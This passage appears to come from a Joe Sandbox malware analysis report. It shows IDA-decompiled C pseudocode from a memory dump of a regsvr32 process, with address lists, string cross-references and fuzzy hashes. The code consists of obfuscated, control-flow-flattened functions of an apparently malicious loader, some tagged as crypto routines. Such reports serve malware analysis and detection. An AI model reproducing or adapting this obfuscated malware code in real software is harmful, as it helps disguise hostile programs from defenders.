							E003DFF4A(_t214);
						}
						goto L13;
					}
					if(_t167 == 0x5b271) {
						_t214 = 0;
						E003C53F6(_t167, 0);
						L10:
						_t167 = 0x75fce;
						continue;
					}
					if(_t167 != 0x661a5) {
						goto L41;
					}
					_t214 =  *0x3e2214; // 0x28e2e0
					_t235 = _t235 + 1;
					_t8 = _t214 + 0x214; // 0x0
					 *_t236 =  *_t8;
					 *(_t214 + 0x214) = _t236;
					goto L10;
					L25:
					__eflags = _t167 - 0x89f56;
					if(_t167 == 0x89f56) {
						_v156 = 0x69183e;
						_t235 = 0;
						_t210 = 0x12;
						_v156 = _v156 / _t210;
						_v156 = _v156 ^ 0x0002c857;
						_v160 = 0x163b7;
						_t211 = 0x6f;
						_v160 = _v160 / _t211;
						_v160 = _v160 >> 2;
						_v160 = _v160 | 0x41158c85;
						_v160 = _v160 ^ 0x4118d1c8;
						_v152 = 0x75da99;
						_v152 = _v152 >> 0xc;
						_v152 = _v152 ^ 0xe4b217c1;
						_v152 = _v152 ^ 0xe4ba4147;
						_v164 = 0x597a2;
						_v164 = _v164 + 0xffff7ead;
						_t212 = 0x53;
						_v164 = _v164 / _t212;
						_v164 = _v164 ^ 0x35290def;
						_t159 =  &_v164;
						 *_t159 = _v164 ^ 0x35276010;
						__eflags =  *_t159;
						_t220 = _v156;
						E003CAE19( &_v56, _v156, _t208, _v160, _v152, _v164);
						_t239 =  &(_t239[4]);
						_t167 = 0x5b271;
						goto L41;
					}
					__eflags = _t167 - 0x95c12;
					if(_t167 == 0x95c12) {
						__eflags = _v132 - 1;
						if(__eflags == 0) {
							_t214 =  &_v112;
							E003C62BA(_t214, _t220);
							goto L13;
						}
						_t167 = 0xa8376;
						continue;
					}
					__eflags = _t167 - 0xa8376;
					if(_t167 == 0xa8376) {
						__eflags = _v132 - 2;
						if(__eflags == 0) {
							_t220 = _t236;
							_t214 =  &_v112;
							E003C9400(_t214, _t236);
							goto L13;
						}
						_t167 = 0xc3f3d;
						continue;
					}
					__eflags = _t167 - 0xbf4ea;
					if(_t167 == 0xbf4ea) {
						_v164 = 0x1255ff;
						_t218 = 0x6c;
						_v164 = _v164 / _t218;
						_v164 = _v164 ^ 0xd5d5f25c;
						_v164 = _v164 ^ 0xd5de02ba;
						_v160 = 0xa6a5df;
						_t219 = 0x79;
						_t220 =  &_v132;
						_v160 = _v160 / _t219;
						_v160 = _v160 | 0x9385a964;
						_v160 = _v160 ^ 0x938a46ca;
						_v156 = 0xedaab;
						_v156 = _v156 >> 6;
						_v156 = _v156 ^ 0x00054f9b;
						_t214 = _v164;
						_t183 = E003DB1BA(_t214,  &_v132, _v160, _v156,  &_v148);
						_t239 =  &(_t239[3]);
						asm("sbb eax, eax");
						_t167 = ( ~_t183 & 0xfffa252d) + 0x75fce;
						continue;
					}
					__eflags = _t167 - 0xc3f3d;
					if(_t167 != 0xc3f3d) {
						goto L41;
					}
					__eflags = _v132 - 3;
					if(__eflags == 0) {
						_t214 =  &_v112;
						E003D92F0(_t214);
						goto L13;
					}
					_t167 = 0x30c08;
				}
			}

0x003c4497
0x003c44a1
0x003c44a8
0x003c44aa
0x003c44b1
0x003c44b2
0x003c44b3
0x003c44b8
0x003c44bc
0x003c44bf
0x003c44c4
0x003c44c9
0x003c44d2
0x003c44da
0x003c44da
0x003c44df
0x00000000
0x00000000
0x003c44e5
0x003c44e5
0x003c461b
0x003c4625
0x003c462d
0x003c4635
0x003c463d
0x003c4645
0x003c464d
0x003c465c
0x003c465f
0x003c4663
0x003c466b
0x003c4673
0x003c4679
0x003c467a
0x003c4686
0x003c468e
0x003c4693
0x003c46ac
0x003c46b0
0x003c46b4
0x003c46b9
0x003c46bc
0x003c46be
0x003c48b9
0x003c48c5
0x003c48c5
0x003c46c4
0x003c46c4
0x003c46c9
0x003c44da
0x003c44da
0x003c44da
0x003c44df
0x00000000
0x00000000
0x00000000
0x003c44df
0x00000000
0x003c48ae
0x003c48ae
0x003c48ae
0x00000000
0x003c44da
0x003c44f0
0x003c458f
0x003c4597
0x003c459c
0x003c45a4
0x003c45b1
0x003c45b5
0x003c45b6
0x003c45ba
0x003c45c2
0x003c45ca
0x003c45d2
0x003c45d7
0x003c45f0
0x003c45f3
0x003c45f4
0x003c45f6
0x00000000
0x00000000
0x003c4600
0x003c4607
0x003c460e
0x003c4611
0x00000000
0x003c4611
0x003c44fb
0x003c4571
0x003c4576
0x003c4582
0x003c4584
0x003c4588
0x003c4546
0x003c4546
0x00000000
0x003c4546
0x003c4578
0x00000000
0x003c4578
0x003c4502
0x003c4555
0x003c455a
0x003c4566
0x003c456a
0x00000000
0x003c456a
0x003c455c
0x00000000
0x003c455c
0x003c4509
0x003c453f
0x003c4544
0x003c454a
0x003c454e
0x003c454e
0x00000000
0x003c4544
0x003c4510
0x003c4536
0x003c4538
0x003c452f
0x003c452f
0x00000000
0x003c452f
0x003c4514
0x00000000
0x00000000
0x003c451a
0x003c4520
0x003c4521
0x003c4527
0x003c4529
0x00000000
0x003c46ce
0x003c46ce
0x003c46d3
0x003c47f3
0x003c4801
0x003c4805
0x003c480a
0x003c4810
0x003c4818
0x003c4824
0x003c4829
0x003c482f
0x003c4834
0x003c483c
0x003c4844
0x003c484c
0x003c4851
0x003c4859
0x003c4861
0x003c4869
0x003c4875
0x003c487c
0x003c4880
0x003c4888
0x003c4888
0x003c4888
0x003c489c
0x003c48a1
0x003c48a6
0x003c48a9
0x00000000
0x003c48a9
0x003c46d9
0x003c46de
0x003c47d4
0x003c47d9
0x003c47e5
0x003c47e9
0x00000000
0x003c47e9
0x003c47db
0x00000000
0x003c47db
0x003c46e4
0x003c46e9
0x003c47b3
0x003c47b8
0x003c47c4
0x003c47c6
0x003c47ca
0x00000000
0x003c47ca
0x003c47ba
0x00000000
0x003c47ba
0x003c46ef
0x003c46f4
0x003c4720
0x003c4730
0x003c4735
0x003c473b
0x003c4743
0x003c474b
0x003c4757
0x003c475a
0x003c475e
0x003c4766
0x003c476e
0x003c4776
0x003c477e
0x003c4783
0x003c4794
0x003c4798
0x003c479d
0x003c47a2
0x003c47a9
0x00000000
0x003c47a9
0x003c46f6
0x003c46fb
0x00000000
0x00000000
0x003c4701
0x003c4706
0x003c4712
0x003c4716
0x00000000
0x003c4716
0x003c4708
0x003c4708

Strings

?kY, xrefs: 003C4673
vAM, xrefs: 003C45C2
(, xrefs: 003C451A
)5, xrefs: 003C4880

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ?kY$vAM$)5$(
API String ID: 0-850677802
Opcode ID: 27aef1cadacc090d50a3be41448aa0bbef0c7293de99a6954cd413862e0a6193
Instruction ID: f69b46e2e50046c46ecc5e36708188f45643098b70ae415740a3819f8524964f
Opcode Fuzzy Hash: 27aef1cadacc090d50a3be41448aa0bbef0c7293de99a6954cd413862e0a6193
Instruction Fuzzy Hash: D1A156715083428BC32ACF25D859A2BBBE5FB95704F10892EF495DA260D7B4DE49CB83

Uniqueness

Uniqueness Score: -1.00%

Function 003D92F0 Relevance: 5.2, Strings: 4, Instructions: 245
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E003D92F0(signed int __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				void* _t256;
				void* _t269;
				void* _t282;
				signed int _t292;
				signed int _t296;
				signed int _t297;
				signed int _t300;
				signed int _t301;
				signed int _t303;
				signed int _t305;
				signed int _t306;
				signed int _t332;
				signed int* _t335;

				_t291 = __ecx;
				_t335 =  &_v1588;
				_v1572 = 0x3bc2d;
				_t256 = 0x57712;
				_v1568 = 0xb0e13;
				_t332 = __ecx;
				_v1564 = 0x49ba;
				do {
					while(_t256 != 0x52aff) {
						if(_t256 == 0x57712) {
							_t256 = 0x52aff;
							continue;
						} else {
							if(_t256 == 0xf618a) {
								_v1576 = 0x556981;
								_v1576 = _v1576 | 0x44b33175;
								_v1576 = _v1576 ^ 0x44f3dfa1;
								_v1580 = 0x8f7fb7;
								_v1580 = _v1580 + 0x8b8a;
								_t305 = 0x4e;
								_v1580 = _v1580 / _t305;
								_v1580 = _v1580 ^ 0x00073771;
								_v1588 = 0x7579ef;
								_t21 =  &_v1588; // 0x7579ef
								_t306 = 0x50;
								_push(_t306);
								_v1588 =  *_t21 / _t306;
								_v1588 = _v1588 >> 1;
								_v1588 = _v1588 | 0xf0a9e1e6;
								_v1588 = _v1588 ^ 0xf0a1b146;
								_v1584 = 0x481cef;
								_v1584 = _v1584 ^ 0x27861ec1;
								_v1584 = _v1584 + 0xffffd2fa;
								_v1584 = _v1584 ^ 0x27cfeaf7;
								return E003D8BA1(_v1576, _v1580, 0, 0, 0, _v1588, 0,  &_v1040, _v1584);
							}
							goto L9;
						}
						L5:
						return _t282;
					}
					_v1584 = 0x647e38;
					_v1584 = _v1584 << 0xd;
					_v1584 = _v1584 >> 0xc;
					_v1584 = _v1584 ^ 0x000b1235;
					_v1588 = 0x5c44d9;
					_v1588 = _v1588 >> 1;
					_v1588 = _v1588 * 0x13;
					_v1588 = _v1588 + 0xffff9cfd;
					_v1588 = _v1588 ^ 0x036dabb4;
					_v1580 = 0x405550;
					_v1580 = _v1580 ^ 0x0cc16d26;
					_v1580 = _v1580 + 0xffff599f;
					_v1580 = _v1580 << 9;
					_v1580 = _v1580 ^ 0x012e001f;
					E003C2493(_t291,  &_v1560, _v1584, _v1588, _v1580);
					_v1580 = 0x17a2f3;
					_t292 = 0x7d;
					_v1580 = _v1580 / _t292;
					_v1580 = _v1580 << 0xf;
					_v1580 = _v1580 | 0x5903a064;
					_v1580 = _v1580 ^ 0x593f6cd2;
					_v1588 = 0xe8c2e2;
					_v1588 = _v1588 ^ 0x21c1b1b2;
					_v1588 = _v1588 + 0x213e;
					_v1588 = _v1588 + 0xa06e;
					_v1588 = _v1588 ^ 0x212e62d7;
					_v1584 = 0x3aefd6;
					_v1584 = _v1584 | 0xf03db4e3;
					_v1584 = _v1584 + 0xffffed2b;
					_v1584 = _v1584 ^ 0xf03b30e4;
					 *((short*)(E003D7C07( &_v1560, _v1580, _v1588, _v1584))) = 0;
					_v1580 = 0x6d0e87;
					_v1580 = _v1580 + 0xad2;
					_v1580 = _v1580 + 0xfffffc76;
					_v1580 = _v1580 ^ 0x0e61a123;
					_v1580 = _v1580 ^ 0x0e0be998;
					_v1588 = 0xeed469;
					_v1588 = _v1588 << 0xe;
					_v1588 = _v1588 + 0xffff9ed5;
					_v1588 = _v1588 << 0xe;
					_v1588 = _v1588 ^ 0x77b3af66;
					_v1584 = 0x58c308;
					_v1584 = _v1584 << 0xc;
					_v1584 = _v1584 ^ 0x8c3613ad;
					E003C4E03( &_v520, _v1580, __eflags, _v1588, _v1584);
					_v1580 = 0xd403c1;
					_v1580 = _v1580 | 0xcfb0caf9;
					_t296 = 0x66;
					_v1580 = _v1580 / _t296;
					_v1580 = _v1580 * 0xf;
					_v1580 = _v1580 ^ 0x1e9a45a3;
					_v1588 = 0x62e029;
					_v1588 = _v1588 | 0x17b98c4e;
					_v1588 = _v1588 ^ 0x1104e817;
					_v1588 = _v1588 * 0x48;
					_v1588 = _v1588 ^ 0xf7b1ce47;
					_v1576 = 0xc81b85;
					_t297 = 0x2a;
					_v1576 = _v1576 / _t297;
					_v1576 = _v1576 ^ 0x00011413;
					_v1584 = 0xb8fba5;
					_v1584 = _v1584 | 0xf1ffb57f;
					_v1584 = _v1584 ^ 0xf1f4c2aa;
					_t269 = E003CD933(_v1580, _v1588, 0x3c1128, _v1576, _v1584);
					_v1588 = 0xced9fe;
					_v1588 = _v1588 * 0x15;
					_v1588 = _v1588 << 1;
					_t300 = 0x51;
					_v1588 = _v1588 / _t300;
					_v1588 = _v1588 ^ 0x0062f225;
					_v1580 = 0xd3a8cf;
					_v1580 = _v1580 >> 2;
					_v1580 = _v1580 ^ 0x00310c0b;
					_v1576 = 0x33c899;
					_v1576 = _v1576 ^ 0xf1842c94;
					_v1576 = _v1576 ^ 0xf1bc36e3;
					_v1584 = 0x9433af;
					_v1584 = _v1584 ^ 0xf75cf1ae;
					_t301 = 0x50;
					_v1584 = _v1584 / _t301;
					_v1584 = _v1584 ^ 0x03153780;
					E003D0E90( &_v1560, __eflags, _t301, _v1580, _v1576,  &_v520,  &_v1040, _v1584, _t269);
					_v1588 = 0x58b742;
					_t303 = 0x45;
					_v1588 = _v1588 * 0x43;
					_v1588 = _v1588 / _t303;
					_v1588 = _v1588 ^ 0x00551215;
					_v1584 = 0x4941f8;
					_v1584 = _v1584 ^ 0x1562d23b;
					_v1584 = _v1584 + 0xfffffbb6;
					_v1584 = _v1584 ^ 0x1528e55d;
					_v1576 = 0xc33b53;
					_v1576 = _v1576 + 0xffff4112;
					_v1576 = _v1576 ^ 0x00c643da;
					E003C43D3(_v1588, _v1584, _v1576, _t269);
					_v1584 = 0xdaaf14;
					_v1584 = _v1584 * 0x60;
					_v1584 = _v1584 ^ 0xfb18043b;
					_v1584 = _v1584 ^ 0xa91d422e;
					_v1576 = 0xd65a0d;
					_v1576 = _v1576 << 0xa;
					_v1576 = _v1576 ^ 0x5960c592;
					_t291 = _v1584;
					_t282 = E003C89F6( &_v1040, _t332, _v1576);
					_t335 =  &(_t335[0x15]);
					__eflags = _t282;
					if(_t282 != 0) {
						_t256 = 0xf618a;
						goto L9;
					}
					goto L5;
					L9:
					__eflags = _t256 - 0xa8358;
				} while (__eflags != 0);
				return _t256;
			}

0x003d92f0
0x003d92f0
0x003d92f9
0x003d9301
0x003d9307
0x003d930f
0x003d9311
0x003d9323
0x003d9323
0x003d9330
0x003d93f9
0x00000000
0x003d9336
0x003d9338
0x003d933e
0x003d9348
0x003d9350
0x003d9358
0x003d9360
0x003d936e
0x003d9373
0x003d9379
0x003d9381
0x003d9389
0x003d938d
0x003d9390
0x003d9391
0x003d939c
0x003d93a0
0x003d93a8
0x003d93b0
0x003d93b8
0x003d93c0
0x003d93c8
0x00000000
0x003d93eb
0x00000000
0x003d9338
0x003d93f8
0x003d93f8
0x003d93f8
0x003d9400
0x003d940c
0x003d9411
0x003d9416
0x003d941e
0x003d9426
0x003d942f
0x003d9433
0x003d943b
0x003d9443
0x003d944b
0x003d9453
0x003d945b
0x003d9460
0x003d9474
0x003d9479
0x003d9489
0x003d9490
0x003d9494
0x003d9499
0x003d94a1
0x003d94a9
0x003d94b1
0x003d94b9
0x003d94c1
0x003d94c9
0x003d94d1
0x003d94d9
0x003d94e1
0x003d94e9
0x003d9504
0x003d950e
0x003d9516
0x003d951e
0x003d9526
0x003d952e
0x003d9536
0x003d953e
0x003d9543
0x003d954b
0x003d9550
0x003d9558
0x003d9560
0x003d9565
0x003d9579
0x003d957e
0x003d9588
0x003d9596
0x003d9599
0x003d95a2
0x003d95a6
0x003d95ae
0x003d95b6
0x003d95be
0x003d95cb
0x003d95cf
0x003d95d7
0x003d95e7
0x003d95ea
0x003d95ee
0x003d95f6
0x003d95fe
0x003d9606
0x003d9623
0x003d9628
0x003d963e
0x003d9642
0x003d964a
0x003d964f
0x003d9655
0x003d965d
0x003d9665
0x003d966a
0x003d9672
0x003d967a
0x003d9682
0x003d968a
0x003d9692
0x003d969e
0x003d96a2
0x003d96aa
0x003d96d3
0x003d96d8
0x003d96e9
0x003d96eb
0x003d96f5
0x003d96f9
0x003d9701
0x003d9709
0x003d9711
0x003d9719
0x003d9721
0x003d9729
0x003d9731
0x003d9745
0x003d974a
0x003d9757
0x003d9762
0x003d976a
0x003d9772
0x003d977a
0x003d977f
0x003d978b
0x003d9790
0x003d9795
0x003d9798
0x003d979a
0x003d97a0
0x00000000
0x003d97a0
0x00000000
0x003d97a2
0x003d97a2
0x003d97a2
0x00000000

Strings

)b, xrefs: 003D95AE
yu, xrefs: 003D9389
PU@, xrefs: 003D9443
>!, xrefs: 003D94B9

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )b$>!$PU@$yu
API String ID: 0-964688552
Opcode ID: 40c85b0a2892c94b1b1177acfe1813d73d1e951787d5b1542207c8fb708862a7
Instruction ID: 85dcdb1dc7d5e84dcc2d3619c2df2af2d5e70eee5fb5f287f5f937652bcec119
Opcode Fuzzy Hash: 40c85b0a2892c94b1b1177acfe1813d73d1e951787d5b1542207c8fb708862a7
Instruction Fuzzy Hash: 3FC112B15093419FC359CF21D58990BBBE1FBD8708F505A1DF19A96260C7B5CA0ACF87

Uniqueness

Uniqueness Score: -1.00%

Function 003D86C1 Relevance: 5.2, Strings: 4, Instructions: 234
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E003D86C1(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t220;
				void* _t222;
				intOrPtr _t229;
				intOrPtr _t231;
				intOrPtr _t242;
				intOrPtr _t247;
				void* _t249;
				signed int _t252;
				signed int _t254;
				signed int _t255;
				signed int _t258;
				intOrPtr* _t272;
				intOrPtr _t273;
				void* _t276;
				void* _t277;

				_t250 = _a8;
				_t272 = _a16;
				_push(_t272);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t220);
				_t277 = _t276 + 0x18;
				_v16 = 0x45ce;
				_t273 = 0;
				_t222 = 0x20ae;
				_v12 = 0;
				_v8 = 0;
				while(_t222 != 0x20ae) {
					if(_t222 == 0x10539) {
						_v32 = 0x7aeb20;
						_t114 =  &_v32; // 0x7aeb20
						_t252 = 0x1c;
						_v32 =  *_t114 * 0x5f;
						_v32 = _v32 ^ 0x2d9d40e1;
						_v48 = 0x5a1970;
						_v48 = _v48 / _t252;
						_v48 = _v48 + 0xffff6653;
						_v48 = _v48 ^ 0x00098e52;
						_v36 = 0x5f4d59;
						_v36 = _v36 + 0xffff22c7;
						_v36 = _v36 ^ 0x005c947e;
						_v44 = 0xc8c2c5;
						_v44 = _v44 << 6;
						_v44 = _v44 | 0xe6f98022;
						_v44 = _v44 ^ 0xf6ffee75;
						_v56 = 0xd2094;
						_v56 = _v56 * 0x4e;
						_v56 = _v56 + 0xffffa2d9;
						_v56 = _v56 * 0x7b;
						_v56 = _v56 ^ 0xebc8aef2;
						_v28 = 0x486060;
						_v28 = _v28 | 0x455ad92b;
						_v28 = _v28 ^ 0x4558cdb3;
						_v52 = 0x935f1d;
						_v52 = _v52 >> 0xb;
						_v52 = _v52 << 2;
						_v52 = _v52 + 0xffff7459;
						_v52 = _v52 ^ 0xfffabd08;
						_v40 = 0x653eee;
						_v40 = _v40 + 0xcb2c;
						_v40 = _v40 + 0xffff7735;
						_v40 = _v40 ^ 0x006fbac3;
						_t229 =  *0x3e221c; // 0x0
						_t231 = E003C9328(_t252, _v48, _v36, _v24, _t252,  *((intOrPtr*)(_t250 + 4)),  *_t250, _v32, _t252,  &_v20, _v44, _v56, _v28, _v52,  *((intOrPtr*)(_t229 + 0x64)), _v40, _v20);
						_t277 = _t277 + 0x3c;
						__eflags = _t231;
						if(__eflags == 0) {
							 *_t272 = _v24;
							_t273 = 1;
							__eflags = 1;
							 *((intOrPtr*)(_t272 + 4)) = _v20;
						} else {
							_t222 = 0x12b33;
							continue;
						}
					} else {
						if(_t222 == 0x12b33) {
							_v44 = 0xa92148;
							_v44 = _v44 << 8;
							_v44 = _v44 >> 5;
							_v44 = _v44 ^ 0x0545803f;
							_v40 = 0xf66449;
							_v40 = _v40 << 2;
							_v40 = _v40 >> 1;
							_v40 = _v40 ^ 0x01e263a8;
							_v28 = 0xade9fb;
							_v28 = _v28 ^ 0x12bbc1dc;
							_v28 = _v28 ^ 0x121237a9;
							_v52 = 0xf0fcc;
							_v52 = _v52 << 8;
							_v52 = _v52 >> 9;
							_v52 = _v52 | 0x2c2db2c2;
							_v52 = _v52 ^ 0x2c285415;
							E003C79D0(_v44, _v40, __eflags, _v28, _v24, _v52);
						} else {
							if(_t222 == 0x194dd) {
								_v40 = 0xe9b69f;
								_t254 = 0x3e;
								_v40 = _v40 / _t254;
								_v40 = _v40 | 0xe4aac50b;
								_v40 = _v40 ^ 0xe4a75de8;
								_v52 = 0xcbe1;
								_v52 = _v52 + 0xffff7816;
								_v52 = _v52 | 0x2504a563;
								_t255 = 0x29;
								_push(_t255);
								_v52 = _v52 / _t255;
								_v52 = _v52 ^ 0x00e8c361;
								_v56 = 0x16e8d2;
								_v56 = _v56 << 1;
								_v56 = _v56 + 0xd9cd;
								_v56 = _v56 ^ 0x516329d4;
								_v56 = _v56 ^ 0x514f846b;
								_push(_t255);
								_t242 = E003C8D52(_t255, _v20, __eflags);
								_v24 = _t242;
								__eflags = _t242;
								if(__eflags != 0) {
									_t222 = 0x10539;
									continue;
								}
							} else {
								if(_t222 != 0x1d305) {
									L13:
									__eflags = _t222 - 0xc682;
									if(__eflags != 0) {
										continue;
									} else {
									}
								} else {
									_v44 = 0x6896e0;
									_v44 = _v44 ^ 0x5c1df3b0;
									_v44 = _v44 << 7;
									_v44 = _v44 ^ 0x3ab2a801;
									_v40 = 0x4e0bbb;
									_v40 = _v40 | 0xeaa8d7e0;
									_v40 = _v40 >> 0xa;
									_v40 = _v40 ^ 0x00379269;
									_v28 = 0x9a48b6;
									_t258 = 0x7a;
									_v28 = _v28 / _t258;
									_v28 = _v28 ^ 0x00091d73;
									_v48 = 0x914b24;
									_v48 = _v48 * 0x28;
									_v48 = _v48 * 0x42;
									_v48 = _v48 ^ 0xda54ef34;
									_v56 = 0xdd5e57;
									_v56 = _v56 >> 1;
									_v56 = _v56 >> 6;
									_v56 = _v56 >> 4;
									_v56 = _v56 ^ 0x0002ff20;
									_v32 = 0x9a8bdf;
									_v32 = _v32 >> 0x10;
									_v32 = _v32 ^ 0x000bab8c;
									_v52 = 0xccfcaa;
									_v52 = _v52 | 0x15ef6403;
									_v52 = _v52 >> 0xd;
									_v52 = _v52 ^ 0x000d01dd;
									_v36 = 0x516c1f;
									_v36 = _v36 + 0xffff9d88;
									_v36 = _v36 ^ 0x0050809c;
									_t247 =  *0x3e221c; // 0x0
									_t249 = E003C9328(_t258, _v40, _v28, _t273, _t258,  *((intOrPtr*)(_t250 + 4)),  *_t250, _v44, _t258,  &_v20, _v48, _v56, _v32, _v52,  *((intOrPtr*)(_t247 + 0x64)), _v36, _t273);
									_t277 = _t277 + 0x3c;
									if(_t249 == 0) {
										_t222 = 0x194dd;
										continue;
									}
								}
							}
						}
					}
					return _t273;
				}
				_t222 = 0x1d305;
				goto L13;
			}

0x003d86c5
0x003d86cc
0x003d86d0
0x003d86d1
0x003d86d5
0x003d86d6
0x003d86da
0x003d86db
0x003d86dc
0x003d86e1
0x003d86e4
0x003d86ec
0x003d86ee
0x003d86f3
0x003d86fc
0x003d8700
0x003d870d
0x003d890d
0x003d8917
0x003d891e
0x003d891f
0x003d8923
0x003d892b
0x003d8939
0x003d893d
0x003d8945
0x003d894d
0x003d8955
0x003d895d
0x003d8965
0x003d896d
0x003d8972
0x003d897a
0x003d8982
0x003d898f
0x003d8993
0x003d89a0
0x003d89a4
0x003d89ac
0x003d89b4
0x003d89bc
0x003d89c4
0x003d89cc
0x003d89d1
0x003d89d6
0x003d89de
0x003d89e6
0x003d89ee
0x003d89f6
0x003d89fe
0x003d8a0e
0x003d8a42
0x003d8a47
0x003d8a4a
0x003d8a4c
0x003d8b02
0x003d8b04
0x003d8b04
0x003d8b09
0x003d8a52
0x003d8a52
0x00000000
0x003d8a52
0x003d8713
0x003d8718
0x003d8a71
0x003d8a79
0x003d8a7e
0x003d8a83
0x003d8a8b
0x003d8a93
0x003d8a98
0x003d8a9c
0x003d8aa4
0x003d8aac
0x003d8ab4
0x003d8abc
0x003d8ac4
0x003d8ac9
0x003d8ace
0x003d8ad6
0x003d8af2
0x003d871e
0x003d8723
0x003d8867
0x003d8877
0x003d887c
0x003d8882
0x003d888a
0x003d8892
0x003d889a
0x003d88a2
0x003d88ae
0x003d88b1
0x003d88b2
0x003d88b6
0x003d88be
0x003d88c6
0x003d88ca
0x003d88d2
0x003d88da
0x003d88f2
0x003d88f3
0x003d88f8
0x003d88fe
0x003d8900
0x003d8906
0x00000000
0x003d8906
0x003d8729
0x003d872e
0x003d8a61
0x003d8a61
0x003d8a66
0x00000000
0x00000000
0x003d8a6c
0x003d8734
0x003d8734
0x003d873e
0x003d8746
0x003d874b
0x003d8753
0x003d875b
0x003d8763
0x003d8768
0x003d8770
0x003d877e
0x003d8782
0x003d8786
0x003d878e
0x003d879b
0x003d87a4
0x003d87a8
0x003d87b0
0x003d87b8
0x003d87bc
0x003d87c1
0x003d87c6
0x003d87ce
0x003d87d6
0x003d87db
0x003d87e3
0x003d87eb
0x003d87f3
0x003d87f8
0x003d8800
0x003d8808
0x003d8810
0x003d881c
0x003d884d
0x003d8852
0x003d8857
0x003d885d
0x00000000
0x003d885d
0x003d8857
0x003d872e
0x003d8723
0x003d8718
0x003d8b15
0x003d8b15
0x003d8a5c
0x00000000

Strings

>e, xrefs: 003D89E6
``H, xrefs: 003D89AC
z, xrefs: 003D8917
YM_, xrefs: 003D894D

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: z$YM_$``H$>e
API String ID: 0-2749853066
Opcode ID: 36f959411a8651a7f85af9c05678d9a6f02de9115f6e50ee1d2ea7b6e559bfb6
Instruction ID: 8a1633dbcee516fe81f5cf008c554638aefd650dd9396fb059a49bcbbb63fb04
Opcode Fuzzy Hash: 36f959411a8651a7f85af9c05678d9a6f02de9115f6e50ee1d2ea7b6e559bfb6
Instruction Fuzzy Hash: F0B120B2008341AFC745CF65D88A80BBFE1FB98748F504A1EF495A6220C3B5DA59CF87

Uniqueness

Uniqueness Score: -1.00%

Function 003CDAE6 Relevance: 5.2, Strings: 4, Instructions: 196
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E003CDAE6(void* __ebx, void* __ecx, void* __edx, intOrPtr _a4, signed int _a8) {
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t173;
				void* _t175;
				signed int _t202;
				void* _t203;
				signed int _t206;
				signed int _t209;
				char* _t210;
				signed int _t211;
				signed int _t212;
				void* _t228;
				signed int* _t229;
				signed int* _t231;

				_t203 = __ebx;
				_t231 =  &_v76;
				_t229 = _a8;
				_push(_t229);
				_push(_a4);
				_t228 = __ecx;
				_push(__edx);
				_push(__ecx);
				E003C2528(_t173);
				_v64 = 0x49c90;
				_t175 = 0x204aa;
				_v60 = 0xb6af2;
				_v56 = 0x666bd;
				while(1) {
					L1:
					_t231 =  &(_t231[4]);
					while(_t175 != 0x6414) {
						if(_t175 == 0x204aa) {
							 *_t229 =  *_t229 & 0x00000000;
							_t175 = 0x489a4;
							_t229[1] = _t229[1] & 0x00000000;
							continue;
						} else {
							if(_t175 == 0x28a4f) {
								_v76 = 0x309ce4;
								_t206 = 0x61;
								_v76 = _v76 * 0x61;
								_v76 = _v76 + 0x3761;
								_v76 = _v76 / _t206;
								_v76 = _v76 ^ 0x003b9273;
								_a8 = 0x7f051;
								_a8 = _a8 + 0xffff594c;
								_a8 = _a8 | 0x5a806d6e;
								_a8 = _a8 << 0xf;
								_a8 = _a8 ^ 0xb6fea51a;
								_v68 = 0xd0fb0c;
								_v68 = _v68 ^ 0x1b608816;
								_t166 =  &_v68;
								 *_t166 = _v68 ^ 0x1bbf2a0d;
								__eflags =  *_t166;
								E003C2050(_t228 + 4, _v76,  *_t166,  &_v52, _a8, _v68);
							} else {
								if(_t175 == 0x489a4) {
									_t229[1] = E003C192C(_t175, _t203, _t228);
									_t175 = 0xfb908;
									continue;
								} else {
									if(_t175 == 0x54d52) {
										_a8 = 0xf9e025;
										_a8 = _a8 ^ 0x69d3ef58;
										_t209 = 0x3e;
										_t210 =  &_v52;
										_a8 = _a8 / _t209;
										_a8 = _a8 << 3;
										_a8 = _a8 ^ 0x0d927a10;
										_v72 = 0x37dd4c;
										_v72 = _v72 + 0xffff0a39;
										_v72 = _v72 ^ 0xed2ea290;
										_v72 = _v72 ^ 0xed176747;
										_v68 = 0x970d3b;
										_v68 = _v68 | 0xdccfb1d2;
